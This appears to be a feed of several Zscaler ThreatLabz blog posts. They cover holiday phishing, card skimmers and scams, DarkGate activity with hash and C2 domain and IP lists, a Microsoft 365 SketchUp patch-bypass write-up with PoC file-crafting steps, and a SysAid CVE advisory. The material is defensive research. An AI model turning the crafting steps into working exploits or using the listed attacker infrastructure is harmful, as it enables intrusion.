Threat actors are always ready to exploit major events and holidays, launching various cyber attacks to target online users. Between November 19th and November 24th of 2023 (essentially, Black Friday, Thanksgiving, and Cyber Monday), Zscaler ThreatLabz observed a spike in phishing, malware, and scam campaigns. In this blog, we examine these cyber attack campaigns, present an analysis of e-commerce traffic trends, and provide guidelines to avoid phishing scams and stay safe while holiday shopping.
Key Takeaways
To avoid holiday online shopping scams, only use official retail applications, closely examine any unauthorized transactions, and keep devices up-to-date with the latest security patches.
Threat actors entice users with urgent phishing themes to steal credentials. Mobile users are often a target because mobile devices make it more difficult to inspect URLs and are not always secured with antivirus software or a secure access service edge (SASE) framework.
Payment card skimming attacks continue to pose a significant threat to e-commerce stores because they leverage the existence of known and legitimate businesses.
Threat actors are leveraging legitimate services for scam and phishing campaigns to bypass reputation-based detection and prey on users’ innate trust in a known service.
How to Avoid Online Scams
Follow the guidelines below to stay protected from the online cyber attacks:
Only download apps from official application stores, such as Google or Apple, and avoid unofficial mobile application stores.
Use only legitimate e-commerce websites and make sure you are utilizing HTTPS/secure connections.
Contact banking authorities if you notice any unauthorized payments made using your payment card.
Don’t fall for exciting “too good to be true” offers from unknown sources.
Take a good look at URLs and website addresses, and verify their authenticity before you click on a link.
Stay away from emailed invoices — this is often a social engineering technique used by cybercriminals.
Always ensure that your operating system and web browser have the latest security patches installed.
Online Shopping Trends: November 19-24
ThreatLabz observed a 244% increase in global online shopping transactions between November 19th and November 24th. Within the United States, ThreatLabz saw a 136% increase in online shopping transactions during that same time period. It turns out that Black Friday (November 24th) is the most popular day for online shopping in the United States, with online shopping activity gaining speed at 9am GMT and peaking at 4pm GMT.
Threat Campaigns Observed Over the Holiday Weekend
Case 1: Phishing
Microsoft Phishing Page
Threat actors lure users into clicking fraudulent links and/or downloading malicious attachments by distributing phishing emails branded to look like familiar themes. In most cases, these phishing emails relate to pending payments, invoices, order details, parcel tracking, etc. — subjects that are likely to elicit a response from users.
Recently, the ThreatLabz team analyzed a Microsoft-themed phishing campaign where the user receives an email with an HTML attachment and a subject related to an “order update” as shown in Figure 1.
Figure 1: Phishing email about an “order” designed to entice a user to open an HTML attachment containing a phishing page
If the user enters their Microsoft credentials, this fraudulent Microsoft login phishing page (shown in Figure 2) sends those credentials to an attacker-controlled domain.
Figure 2: Microsoft phishing page with a Black Friday theme
USPS Phishing Page
We observed another phishing campaign that leveraged the United States Postal Service (USPS) brand to target mobile users as shown in Figure 3. In this campaign, threat actors distributed a USPS phishing page to mobile users, encouraging them to pay for a missing package — thereby obtaining sensitive payment information. Interestingly, we observed that some of the USPS phishing pages can only be accessed through a mobile device. If users on other devices try to access the phishing page, they are redirected to the legitimate USPS website. In addition, many of the domains hosting these phishing pages were newly registered, which can sometimes indicate the malicious nature of a domain.
Figure 3: Fake USPS page displayed on a mobile device
The Click Update button on the landing page redirects users to another fraudulent page where users are asked to provide their address details as shown in Figure 4. The other buttons on the landing page redirect users to the legitimate USPS website.
Figure 4: Fake USPS website asking for payment and address details
After the user enters their address, they are redirected to a payment page. On the payment page, the user is asked to enter payment details. Once the phishing page acquires the user’s payment method details and Personal Identifiable Information (PII), like their address, the data is sent to an attacker-controlled domain.
Case 2: Card Skimmers
As the holiday shopping season starts, various e-commerce stores offer large discounts to attract shoppers. Unfortunately, this also attracts threat actors who see this as an opportunity to compromise the website to steal user payment information.
Every year, we observe a spike in card skimmer attacks between November 19th and November 24th. Threat actors inject malicious scripts into legitimate e-commerce websites and use different techniques to remain undetected for long periods. These techniques include:
Using newly registered domains and legitimate services for data exfiltration
Injecting malicious code through another compromised legitimate website
Injecting malicious code only on the payment page
ThreatLabz observed a card skimming attack on an e-commerce website related to a Black Friday sale as shown in Figure 5. In this campaign, an e-commerce website was injected with a malicious skimmer script that exfiltrated payment details from online shoppers trying to take advantage of Black Friday deals. The skimmer script is heavily obfuscated and employs multiple functions to avoid detection and analysis.
Figure 5: Compromised e-commerce website
The skimmer script shown in Figure 6:
Features anti-debugging capabilities to detect if developer tools are opened, which, if detected, causes the script to exit
Checks if the current URL has keywords like “checkout”, “cart”, “step”, “confirm”, and “order” to verify if the user is ready to make a purchase and enter payment information
Exfiltrates sensitive data (i.e. payment details), encodes it in Base64, and transmits it to the attacker
Figure 6: A snapshot of the malicious skimmer code injected into the website
In another case, ThreatLabz detected an e-commerce website being compromised by threat actors who injected a malicious payment card skimmer script into the website and tried to exfiltrate card details to a newly registered domain as shown in Figure 7.
Figure 7: A snapshot of the malicious skimmer code injected into the website
The payment card skimmer script has the following capabilities:
Collects data from all the input, select, and textarea fields using the onchange event and adds the data to an array
Calls the data collection function after 1.5 seconds using the setInterval() function
Creates an HTML image element with the height and width of 1px
Calls the image source URL, which is really the data exfiltration URL, and then appends the stolen data to the image in a Base64 encoded format
Case 3: Scam Campaigns
Our team encountered several newly registered shopping websites that attempted to look like familiar and legitimate brands, thereby gaining the trust of online shoppers and facilitating online scams.
These deceptive websites tend to offer massive discounts and create a sense of urgency, pressuring online shoppers to make hasty decisions without considering potential risks. An example is shown in Figure 8.
Figure 8: A screenshot of a fake shopping website resembling Magalu, a legitimate Brazilian retailer
When users proceed to purchase an item, they are directed to make payments through Pix payment applications — an established payment method in Brazil. After the payment is made, users are asked to send payment proof via email to “Magalu” to secure their item (shown in Figure 9). In reality, the Pix payment information is being sent to an email address controlled by the attacker.
Figure 9: A screenshot of the fraudulent request to share Pix transaction details
In another scam, threat actors used legitimate services like Google Forms to lure users with discount offers, only to steal payment card details (shown in Figure 10). Using legitimate services allows the threat actors to avoid reputation-based detection and remain active for longer periods of time.
Figure 10: A screenshot of a scam Google Form page used to lure users with Black Friday offers
In the screenshot below, threat actors ask users to provide credit card information to make reservations and mention that the card details will be encrypted.
Figure 11: A screenshot of the payment card details the user is asked to enter into a Google Form page
Conclusion
As we wrap up one holiday shopping season and head into another, it’s crucial to reflect on potential cyber threats. To ensure a secure online shopping experience, pay close attention to unauthorized account activity, double-check the legitimacy of website addresses, and utilize official applications and websites to shop online. These online shopping recommendations can be carried into the winter holiday to ensure a safe and joyful season.
Holiday season or not, the Zscaler ThreatLabz team is actively tracking campaigns targeting online shoppers and providing coverage to ensure that our customers are protected from these kinds of attacks.
Zscaler Coverage
Advanced Threat Protection Signatures
JS.POS.Magecart
JS.Downloader.Magecart
HTML.Phish.Microsoft.LZ
HTML.Phish.USPS
HTML.Phish.Gen.LZ
HTML.Phish.Gen.NU
Mon, 11 Dec 2023 09:34:27 -0800Prakhar Shrotriyahttps://www.zscaler.com/blogs/security-research/cyber-attacks-during-holidays-tips-and-trendsRecent DarkGate Activity & Trends
https://www.zscaler.com/blogs/security-research/recent-darkgate-activity-trends
Introduction
DarkGate is a malware family, dating back to 2018, that gained prominence after the demise of Qakbot with a Malware-as-a-Service (MaaS) offering advertised in underground cybercrime forums starting in the summer of 2023. This blog examines DarkGate intrusion trends observed by ThreatLabz between June and October 2023.
Key Takeaways
DarkGate activity surged in late September and early October 2023.
According to our customer telemetry, the technology sector is the most impacted by DarkGate attack campaigns.
Most DarkGate domains are 50 to 60 days old, which may indicate a deliberate approach where threat actors create and rotate domains at specific intervals.
Trend 1: DarkGate activity surges in late September, early October
To better understand DarkGate distribution trends, the ThreatLabz team analyzed hostnames, registration information, IP addresses, website content, and any recent patterns that emerged.
Increase in DarkGate domains
Our analysis revealed that there was a significant rise in the number of active DarkGate domains during the last week of September 2023. This means that more DarkGate websites associated with illegal activities were active during this specific time period.
Uptick in DarkGate transactions
DarkGate transactions increased in late September and into October. Notably, there was a substantial spike in transactions on October 10, 2023. This suggests that the threat actors behind Darkgate were particularly active during this time, possibly executing a series of attacks.
This DarkGate transaction data was compiled by observing the Zscaler cloud. Each time an infected machine made contact with a C2 server was counted as a transaction.
Figure 1: Illustrates spikes in DarkGate command-and-control (C2) activity by date
Trend 2: Technology sector most targeted by DarkGate
Based on analysis of our customer telemetry, the technology industry is the most targeted by DarkGate at 36.7%. Food, beverage, and tobacco come in second at 12.7%.
Figure 2: Industries most targeted by DarkGate
Trend 3: Most DarkGate domains are 50 to 60 days old
ThreatLabz found a concentrated level of activity (such as serving websites, handling transactions, or participating in network communications) among hostnames that have been in existence for 50-60 days. The fact that DarkGate domains follow this pattern could indicate that threat actors are taking a systematic approach where they create and rotate domains at specific intervals. Most likely, this intentional pattern perpetrated by threat actors is a way of evading security measures that target known malicious domains.
Figure 3: Age distribution of DarkGate domains based on transaction volume
Conclusion
The recent surge in DarkGate's activity can be attributed to its use as a replacement for Qakbot. In addition to staying on top of the threat of DarkGate malware, Zscaler's ThreatLabz team continuously monitors for new and emerging threats and shares its findings with the wider security community.
Zscaler Coverage & Indicators of Compromise (IOCs)
Zscaler's multilayered cloud security platform detects indicators related to DarkGate at various levels. Zscaler Sandbox played a particularly crucial role in analyzing the behavior of various files. Through this sandbox analysis, the threat scores and specific MITRE ATT&CK techniques triggered were identified, as illustrated in the screenshot provided below. Zscaler’s advanced threat protection capabilities and comprehensive zero trust approach empowers cybersecurity professionals with critical insights into malware behavior, enabling them to effectively detect and counter the threats posed by malicious actors.
Win64.Downloader.DarkGate
Win32.Trojan.DarkGate
Win64.Trojan.DarkGate
LNK.Downloader.DarkGate
VBS.Downloader.DarkGate
JS.Downloader.DarkGate
Figure 4: Zscaler Cloud Sandbox
MITRE ATT&CK TTP’s
Tactic
Technique ID
Technique ID
Initial Access
T1566
Phishing
Execution
T1204
T1059
T1569
User Execution
Command and Scripting Interpreter
System Services
Persistence
T1547
Boot or Logon Start Execution
Defense Evasion
T1027
T1070.004
T1202
T1564.001
T1140
Obfuscated Files or Information
File Deletion
Indirect Command Execution
Hidden Files and Directories
Deobfuscate/Decode Files for Information
Credential Access
T1555.003
Credentials from Web Browsers
Discovery
T1016
T1083
T1057
T1082
System Network Configuration Discovery
File and Directory Discovery
Process Discovery
System Information Discovery
Command and Control
T1071
Application Layer Protocol
Indicators of Compromise (IoCs)
Phishing PDF: 55f16d7f0a1683f32b946c03bdda79ca
Malicious DLL: a2fb0b0d34d71073cd037e872d40ea14
Encoded AutoIt Script: 0ea7d1a7ad1b24835ca0b2fc6c51c15a
AutoIt Loader Benign: c56b5f0201a3b3de53e561fe76912bfd
DarkGate Payload: f242ce468771de8c7a23568a3b03a5e2
Malicious ZIP: d2efccdb50c7450e8a99fec37a805ce6
LNK File: 7791017a97289669f5f598646ef6d517
Phishing PDF: 803103fe4b32c86fb3f382ee17dfde44
Malicious ZIP: 0a341353e5311d8f01f582425728e1d7
VBS File: 3df59010997ed2d70c5f7095498b3b3f
Encoded AutoIt Script: 660bc32609a1527c90990158ef449757
AutoIt Loader Benign: c56b5f0201a3b3de53e561fe76912bfd
DarkGate Payload: 9bf2ae2da16e9a975146c213abd7cd4f
Malicious ZIP: 9f93952e425110de34e00ebd6d6daab3
VBS File: c78dfe0f9b4fd732c8e99eb495ed9958
Encoded AutoIt Script: 660bc32609a1527c90990158ef449757
AutoIt Loader Benign: c56b5f0201a3b3de53e561fe76912bfd
DarkGate Payload: 9bf2ae2da16e9a975146c213abd7cd4f
Malicious ZIP: 54e65e96d2591106a2c41168803c77ff
JS File: 57cfc3b0b53e856c78b47867d7013516
Phishing Email: 0a50d4ea1a9d36f0c65de0e78eacbe95
PDF document: 097cbe9af6e66256310023ff2fbadac6
Malicious CAB File: 6ecd98dfd52136cff6ed28ef59b3f760
MSI File: 8ef6bc142843232614b092fac948562d
CAB file dropped from MSI: a169cebb4009ecfb62bb8a1faf09182f
Command-and-control (C2)
luxury-event-rentals[.]com
drvidhya[.]in
alianzasuma[.]com
cpm.com[.]py
corialopolova[.]com
skylineprodutora[.]com.br
medsure[.]com.br
humanrecruitasia[.]com
journeotravel[.]com
skylineprodutora.com[.]br
ahantadevnet[.]org
yellowstone[.]com.mm
asiaprofessionals[.]net
axecapital[.]ro
semquedagotas[.]com.br
reverasuplementos[.]fun
tikwave[.]site
grupec[.]com.co
chatpipoca[.]net
ncsinternationalcollege[.]com
gatraders.com[.]pk
ibuytech[.]pk
winstonandfriendz[.]ca
skincaremulher[.]fun
adam-xii-rpl.my[.]id
mycopier.com[.]my
japaaesthetics[.]com
msteamseyeappstore[.]com
youth[.]digital
roundstransports[.]com
mfleader.com[.]ar
fefasa[.]hn
nile-cruiise-egypt[.]com
flyforeducation[.]com
expertaitalia[.]eu
plataformaemrede[.]com.br
runnerspacegifts[.]com/umn/
kiwifare[.]net
getldrrgoodgame[.]com
hmas[.]mx
darkgate[.]com
5.188.87.58
5.42.77.33
45.144.28.244
94.228.169.123
94.228.169[.]143[:]2351/
94.228.169[.]143[:]8080/
66.42.110.147
94.131.106.78
88.119.175.245
45.32.222.253
grupowcm[.]com[.]br
thekhancept[.]com
eelontech[.]com
bligevale[.]co[.]zw
dhtech[.]ae
techs[.]com
gsrhrservices[.]com
glowriters[.]com
a2zfortextile[.]com
alpileannn[.]com
boutiquedhev[.]com
hypothequeswestisland[.]com
onetabmusic[.]com
sirishareddy[.]info
appapi[.]store
sictalks[.]com
nia-dbrowntestserver[.]com[.]ng
ofc[.]ai
unasd[.]org
plusmag[.]ro
beautifullike[.]com
gsrglobal[.]org
winstonandfriendz[.]ca
divinfosystem[.]com
supershuttles[.]co[.]za
ziaintegracion[.]com
themarijuanashow[.]com
blackshine[.]lk
deroze[.]net
vtektv[.]com
dna-do-gamer[.]com
kalismprivateltd[.]co[.]uk
arshany[.]com
kelotecnologia[.]com
millennialradio[.]es
phomecare.co.uk
Mon, 04 Dec 2023 10:54:22 -0800Shatak Jainhttps://www.zscaler.com/blogs/security-research/recent-darkgate-activity-trendsThreatLabz Discovers 117 Vulnerabilities in Microsoft 365 Apps Via the SketchUp 3D Library - Part 2
https://www.zscaler.com/blogs/security-research/threatlabz-discovers-117-vulnerabilities-microsoft-365-apps-sketchup-3d-part-2
Introduction
In Part 1 of this series, we’ve demonstrated how ThreatLabz reverse engineered the SketchUp 3D library in Microsoft 365 as well as the SKP file format. Furthermore, we developed two effective fuzzing harnesses.
Microsoft published CVE-2023-28285 and CVE-2023-29344 (in April and May of 2023, respectively) to address the vulnerabilities identified by the Zscaler ThreatLabz research team. The ThreatLabz research team analyzed the patch for CVE-2023-29344 and discovered a bypass, which in turn, led to Microsoft addressing the vulnerabilities through CVE-2023-33146. In this blog, we examine how it was possible to bypass CVE-2023-29344. In addition, we analyze real-world case studies to gain further insight into how these vulnerabilities impact security.
How to Bypass CVE-2023-29344
Watch the video
In the following video, we show how CVE-2023-29344 can be bypassed, which led to the release of CVE-2023-33146.
Read the write-up
In May of 2023, the patch for CVE-2023-29344 was released and was intended to fix all vulnerabilities located in FreeImage. The patched version of MSOSPECTRE.DLL is 16.0.16327.20240, as shown in the figure below.
Figure 1: The patched version of MSOSPECTRE.DLL for CVE-2023-29344
First, let’s explore the details of the patch for CVE-2023-29344.
The figure below shows the comparison of SketchUpModelReader::ReadModel before and after the patch.
Figure 2: The comparison of SketchUpModelReader::ReadModel before and after the patch.
This patch introduced some code changes to disable support for SKP files with the MFC type. This is because all vulnerabilities in FreeImage were reported to Microsoft through the SKP files with the MFC type. Accordingly, Microsoft fixed these vulnerabilities by disabling support for SKP files with the MFC type, rather than fixing the underlying issues within the FreeImage library. As a result, this patch is incomplete, because these vulnerabilities in the FreeImage library could still be triggered using SKP files with the VFF type.
Next, let’s take a look at the process of bypassing the patch for CVE-2023-29344.
The figure below shows a Proof-of-Concept (PoC) crafting template for an SKP file with the VFF type, which includes a SketchUp header, a VFF header, and an embedded zip file. All data related to SketchUp 3D models are stored within a zip file.
Figure 3: A PoC crafting template for SKP file with the VFF type
We extract the part of the zip file within an SKP file and then analyze it using the zip template in 010 Editor. The result of the parsing operation reveals an image stored within the materials folder.
Figure 4: Analyzing the zip file embedded in the SKP file using the ZIP template in 010 Editor
Craft a new PoC.
Compress the abnormal image file using the Deflate algorithm.
zlib.compressobj(compresslevel, zlib.DEFLATED, -zlib.MAX_WBITS, zlib.DEF_MEM_LEVEL, 0).compress(data)
Calculate the new CRC32 for the uncompressed image data. We can use 010 Editor’s CRC32 tool or Windows built-in CRC utility.
Update the fields frCrc, frCompressSize, frUncompressSize, and frData (compressed image data)
Update the field deHeaderOffset for each dirEntry, and also update the fields deCrc, deCompressSize, and deUncompress in struct ZIPDIRENTRY dirEntry[4] materials/_1/E70785.tif. Update the field erDirectoryOffset in the struct ZIPENDLOCATOR endLocator
Combine the SketchUp header, VFF header, and the modified zip file into a complete SKP file.
Finally, we need to re-calculate the checksum in the VFF header. We uncovered a specific algorithm responsible for computing this checksum. Figure 6 shows a pseudo-code representation of this algorithm.
Figure 5: The parsing result in 010 Editor
Figure 6: The specific algorithm responsible for computing this checksum in a VFF header
So far, we’ve elaborated on the steps of crafting the new PoC to bypass the patch for CVE-2023-29344. With this approach, we reproduced 97 unique vulnerabilities in Microsoft 365 apps updating to the patch of CVE-2023-29344. Microsoft assigned CVE-2023-33146 for this discovery which bypassed the original patch.
Finally, Microsoft disabled the ability to insert SketchUp files in Office documents in the patch for CVE-2023-33146.
A screenshot of the Microsoft update
Real-World Cases
Microsoft Office SKP file parsing `CVertex` object use-after-free vulnerability
The figure below shows a use-after-free vulnerability that is associated with the parsing of an abnormal SKP file in Microsoft Office.
Figure 7: Microsoft Office SKP File Parsing `CVertex` object Use-After-Free Vulnerability
Microsoft Office SKP file parsing TIFF image integer overflow vulnerability
The figure below shows an integer overflow vulnerability that is associated with the parsing of an SKP file containing an abnormal TIFF image in Microsoft Office. This vulnerability ultimately results in a crash within the memcpy function.
Figure 8: Microsoft Office SKP File Parsing TIFF Image Integer Overflow Vulnerability
Microsoft Office SKP file parsing uninitialized memory vulnerability
The figure below shows an uninitialized memory vulnerability that is associated with the parsing of an abnormal SKP file in Microsoft Office. This vulnerability potentially results in remote code execution.
Figure 9: Microsoft Office SKP File Parsing Uninitialized Memory Vulnerability
Microsoft Office SKP File parsing BMP image out-of-bounds write vulnerability
The figure below shows an out-of-bounds write vulnerability that is associated with the parsing of an SKP file containing an abnormal BMP image in Microsoft Office.
Figure 10: Microsoft Office SKP File Parsing BMP Image Out-of-Bounds Write Vulnerability
Microsoft Office SKP File parsing PICT image out-of-bounds write vulnerability
The figure below shows an out-of-bounds write vulnerability (CVE-2023-29344) that is associated with the parsing of an SKP file containing an abnormal PICT image in Microsoft Office. The PoC file for this vulnerability is an SKP file with the MFC type.
Figure 11: Microsoft Office SKP File Parsing PICT Image Out-of-Bounds Write Vulnerability (PoC with MFC type)
In Figure 12, we observe the bypass of CVE-2023-29344 using an SKP file with the VFF type.
Figure 12: Microsoft Office SKP File Parsing PICT Image Out-of-Bounds Write Vulnerability (PoC with VFF type)
Conclusion
In this two part series, we’ve walked you through the process of reverse engineering the Office 3D component, and we’ve also explored how to create two effective fuzzing harnesses, one for SketchUp and the other for FreeImage. The results have been highly effective. We discovered 117 unique vulnerabilities within the Office 3D component in Microsoft 365 apps in approximately three months. These security vulnerabilities demonstrate the importance of performing security code audits and blackbox fuzzing for third-party libraries before they are introduced into a new or existing product.
Mitigation
All users of Microsoft 365 apps are encouraged to upgrade to the latest version of the software. Zscaler’s Advanced Threat Protection and Advanced Cloud Sandbox can protect customers against these vulnerabilities as follows:
Win64.Exploit.CVE-2023-28285
Win64.Exploit.CVE-2023-29344
Win64.Exploit.CVE-2023-33146
Appendix
The following vulnerabilities were discovered and reported by ThreatLabz while fuzzing the SketchUp library in Microsoft 365 applications.
References
https://www.adobe.com/creativecloud/file-types/image/vector/skp-file.html
https://insider.microsoft365.com/en-us/blog/add-sketchup-files-to-office-creations
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-33146
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-28285
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-29344
https://msrc.microsoft.com/blog/2023/04/congratulations-to-the-top-msrc-2023-q1-security-researchers/
https://www.zerodayinitiative.com/advisories/published/2022/
https://freeimage.sourceforge.io/
https://sketchup.cgtips.org/
https://www.g2.com/reports/grid-report-for-architecture-spring-2023.embed?featured=sketchup&secure%5Bgated_consumer%5D=2a23be4d-2a72-444a-9ad7-cdc55120636c&secure%5Btoken%5D=e98cea6efb6f05c7a9cf8335d15f112eadc67748340a634576f6bd49c2d718a0&utm_campaign=gate-1886690
Tue, 21 Nov 2023 08:03:04 -0800Kai Luhttps://www.zscaler.com/blogs/security-research/threatlabz-discovers-117-vulnerabilities-microsoft-365-apps-sketchup-3d-part-2Coverage Advisory for CVE-2023-47246 SysAid Zero-Day Vulnerability
https://www.zscaler.com/blogs/security-research/coverage-advisory-cve-2023-47246-sysaid-zero-day-vulnerability
Introduction
On November 8 2023, SysAid published an advisory for CVE-2023-47246 regarding a critical zero-day vulnerability on their SysAid On-Premise software. SysAid describes the vulnerability as a path traversal vulnerability leading to code execution for the same software. This blog includes immediate recommendations for SysAid On-Premise software customers, best practices for long-term protection against these kinds of vulnerabilities, and a brief analysis of the attack chain.
Recommendations
SysAid recommends customers using On-Premise software to do both of the following:
Upgrade to version 23.3.6
Perform a full system and network assessment to detect potential compromise
If any indicators of compromise (IoCs) are found, Zscaler recommends SysAid On-Premise customers follow the incident response protocol and take immediate action. In addition, Zscaler strongly recommends upgrading to the latest versions. More information on the upgrade is available here and here.
Attribution
Lace Tempest (DEV-0950 / TA-505) are the threat actors believed to be responsible for exploiting this vulnerability. This same group is responsible for exploiting the MoveIT Transfer vulnerability earlier this year, and is associated with a ransomware group known as "CL0P".
Attack Chain
Figure 1: An attack chain depicting a threat actors exploiting the CVE-2023-47246 vulnerability to infiltrate the SysAid system
Possible Execution
How it works
The threat actors successfully uploaded a WAR archive that housed a WebShell and various payloads into the webroot of the SysAid Tomcat web service by exploiting the SysAid CVE-2023-47246 Path Traversal vulnerability. The vulnerability is located in the doPost method of the SysAid com.ilient.server.UserEntry class. Exploiting this vulnerability involves manipulating the accountID parameter to introduce a path traversal, allowing the attacker to determine the location on the vulnerable server where the WebShell is written. The attack is executed by delivering a POST request with a zipped, compressed WAR file containing the WebShell as the request body. Subsequently, the threat actor gains access to the WebShell, enabling them to interact with the compromised system.
PowerShell used to execute GraceWire
The threat actor leveraged unauthorized access to deploy a PowerShell script to execute the GraceWire loader on the victim’s machine.
The PowerShell script (pictured below) enumerates all the files listed in the C:\Program Files\SysAidServer\tomcat\webapps\usersfiles directory and then checks for antivirus or anti-malware processes beginning with “Sophos”. If the script detects adversarial software running on the victim’s system, then it exits to avoid detection.
If the script doesn’t detect antivirus or anti-malware software, then it executes the GraceWire loader (user.exe) on the victim’s machine.
Figure 2: The PowerShell script used to launch the GraceWire loader (user.exe)
GraceWire Loader Analysis
The GraceWire loader follows a sequence of steps. First, it checks for the existence of a file named <filename>.bin, which contains an encrypted payload. If this file is present in the current directory, the loader proceeds to read its contents using the ReadFile() function, storing the data in the allocated memory. Subsequently, it decrypts the encrypted information and calculates checksums. If the checksum is verified as correct, the program executes the decrypted bin payload. This payload is designed to deploy the GraceWire trojan. Additionally, the loader injects the GraceWire Trojan into various processes, including:
spoolsv.exe
msiexec.exe
svchost.exe
When examining the code, we also discovered debug print statements showcasing the control flow of the GraceWire loader.
Figure 3: A screenshot of debug print statements showcasing the control flow of the GraceWire loader
Getting rid of evidence
Threat actors employ another PowerShell script to systematically eliminate traces and evidence linked to their malicious activities once they have infiltrated the victim’s system. This post-exploitation tactic is aimed at erasing digital footprints and minimizing the likelihood of detection by removing indicators of compromise (IoCs).
Possible other exploits
Microsoft posted a tweet highlighting the exploitation of this vulnerability in CL0P ransomware and strongly recommends system updates.
In addition, SysAid found supporting evidence indicating the utilization of the following PowerShell command to download and execute CobaltStrike.
Figure 4: PowerShell command to download and execute CobaltStrike
Best Practices
Safeguard crown jewel applications by limiting lateral movement using Zscaler Private Access, especially with application security modules turned on.
Route all server traffic through Zscaler Private Access with additional application security module enabled and Zscaler Internet Access, which will provide the right visibility to identify and stop malicious activity from compromised systems/servers.
Turn on Zscaler Advanced Threat Protection to block all known command-and-control domains. This will provide additional protection in case the adversary exploits this vulnerability to implant malware.
Extend command-and-control protection to all ports and protocols with the Zscaler Cloud Firewall (Cloud IPS module), including emerging C2 destinations. Again, this will provide additional protection in case if the adversary exploits this vulnerability to implant malware.
Use Zscaler Cloud Sandbox to prevent unknown malware delivered as part of a second stage payload.
Ensure you are inspecting all SSL traffic.
Restrict traffic to the critical infrastructure from the allowed list of known-good destinations.
Zscaler Coverage
The Zscaler ThreatLabZ team has deployed protection.
Zscaler Advanced Threat Protection:
App.Exploit.CVE-2023-47246
Zscaler Private Access AppProtection:
Local File Inclusion : 930110 (Path Traversal Attack (/../) - Decoded Payloads)
Details related to these signatures can be found in the Zscaler Threat Library.
Apache.Exploit.CVE-2021-44228
Win32.Ransom.Clop
Win32.Trojan.GraceWire
Indicators of Compromise (IoCs)
For a list of IoCs, please visit the indicators section of SysAid On-Prem Software CVE-2023-47246 Vulnerability.
*This article will be updated as information becomes available or if additional protection is put in place by Zscaler.
Wed, 15 Nov 2023 07:56:09 -0800Nishant Guptahttps://www.zscaler.com/blogs/security-research/coverage-advisory-cve-2023-47246-sysaid-zero-day-vulnerabilityGenerative AI: 5 Enterprise Predictions for AI and Security — for 2023, 2024, and Beyond
https://www.zscaler.com/blogs/security-research/generative-ai-5-enterprise-predictions-ai-and-security-2023-2024-and-beyond
Trends/Predictions
Enterprise use of AI tools will only grow, with industries like manufacturing leading the charge
Enterprises will secure AI/ML applications to stay ahead of risk
Enterprises will seek visibility and intelligent access controls around AI and ML applications
AI will become a key component of enterprise data protection
AI will transform how enterprises understand risk and security from the top down
We’ve entered the era of widespread adoption for generative AI tools. From IT, to finance, marketing, engineering, and more, AI advances are causing enterprises to re-evaluate their traditional approaches to unlock the transformative potential of AI. Our recent data analysis of AI/ML trends and usage confirms this: enterprises across industries have substantially increased their use of generative AI, across many kinds of AI tools.
What can enterprises learn from these trends, and what future enterprise developments can we expect around generative AI? Between our research and dozens of conversations with customers and partners, there are a number of trends that we can expect to see this year, in 2024, and onward.
Enterprise use of AI tools will only grow, with industries like manufacturing leading the charge
Our research shows that, mirroring the broader AI trend, enterprises across industry verticals sharply increased their use of AI from May 2023 to June 2023, with sustained growth through August 2023. We see that the majority of AI/ML traffic is being driven by manufacturing, which may offer a glimpse into the rapid innovation and transformation driven by Industry 4.0. Indeed, its substantial engagement in these tools highlights the likely key role that AI and ML will play in the future of manufacturing.
Figure 1: Breakdown of AI popularity by industry vertical
Other industries, like finance, have shown steep growth in the use of AI/ML tools, largely driven by the adoption of generative AI chat tools like ChatGPT and Drift. Indeed, since June 2023, the finance sector has experienced continuous growth in these areas.
Figure 2: ChatGPT transaction trends by industry vertical
Unsurprisingly, OpenAI.com has emerged as a driving force, accounting for 36% of the AI/ML traffic we observed. Of that 36% observed, 58% of traffic to that domain can be attributed to ChatGPT. However, when it comes to the most popular tool in use, Drift takes the crown, followed by ChatGPT and tools like LivePerson and Writer. As new AI use cases continue to emerge, it is likely that we will see enterprises adopt AI — not merely in leveraging generative AI chat tools, but as a core driver of business that can create competitive differentiation.
Figure 3: Pie chart of top AI applications
Enterprises will work to secure AI/ML applications to stay ahead of risk
Our research also found that as enterprises adopt AI/ML tools, subsequent transactions undergo significant scrutiny. Overall, 10% of AI/ML-related transactions are blocked across the Zscaler cloud using URL filtering policies. Here, the technology and finance industries are leading the charge, accounting for more than half of blocked transactions. Interestingly, Drift holds the distinction of being the most blocked, as well as most used, AI application. In all likelihood, we will see other industries take their lead to ensure that enterprises can minimize the risks associated with AI and ML tools.
Figure 4: Blocked transactions by industry vertical
The risks of leveraging AI and ML tools
As we discussed in a recent blog, the risks of using generative AI tools in the enterprises are significant. In general, they fall into two buckets:
1. The release of intellectual property and non-public information
Generative AI tools can make it easy for well-meaning users to leak sensitive and confidential data. Once shared, this data can be fed into the data lakes used to train large language models (LLMs), and can be discovered by other users. For example, a backend developer who queries ChatGPT, “Can you take this [my source code for a new product] and optimize it?” Or, a sales team member inputs the prompt, “Can you create sales trends based on the following Q2 pipeline data?” In both cases, sensitive information or protected IP may have leaked outside the organization.
2. The data privacy and security risks of AI applications themselves
Not all AI applications are created equal. Terms and conditions can vary widely among the hundreds of AI/ML applications in popular use. Will your queries be used to further train an LLM? Will your data be mined for advertising purposes? Will it be sold to third parties? These are questions enterprises must answer. Similarly, the security posture of these applications can also vary, both in terms of how data is secured and the overall security posture of the company. Enterprises must be able to account for each of these factors, assigning risk scores among hundreds of AI/ML applications, to secure their use.
Enterprises will seek visibility and intelligent access controls around AI and ML applications
As a corollary to this last trend, it’s likely that enterprises will continue to seek precise controls for their AI/ML applications. For many enterprises, visibility will be the starting point of creating an AI security policy, followed by the adoption of intelligent, granular access controls to ensure that users can embrace these tools in an approved, secure fashion. There are a number of key questions that enterprises will want to answer, including:
Do I have deep visibility into employee AI app usage? Enterprises will seek complete visibility into the AI/ML tools in use. In addition, they will monitor corporate traffic and transactions to these applications.
Can I allow access to only certain AI apps? Enterprises will want to allow granular access to approved AI applications at the department, team, and user levels. Moreover, they will want to use URL filtering to broadly block access to unsafe or unwanted AI/ML tools. In addition, enterprises may consider the ability to allow ‘cautioned’ access—where users may use a specific tool, but they are coached around the risks and limitations of using it.
Which AI applications protect private data? Enterprise must understand the security posture of the AI apps that employees are using, among the hundreds of AI tools in everyday use. In order to appropriately configure access policies, enterprises must understand which of these applications will protect their data and assess the security of the organizations creating/managing these applications.
Can I prevent data from leaving the organization? Preventing data loss will be a key factor in embracing generative AI. Enterprises will likely gravitate to data loss prevention (DLP) technologies that allow them to create policies preventing the leakage of sensitive data like source code, structured data like credit card information, and PII. In a more sophisticated fashion, it will also become more common for enterprises to block risky user actions when using generative AI tools that are key contributors to data loss — like copy & paste, and uploads and downloads.
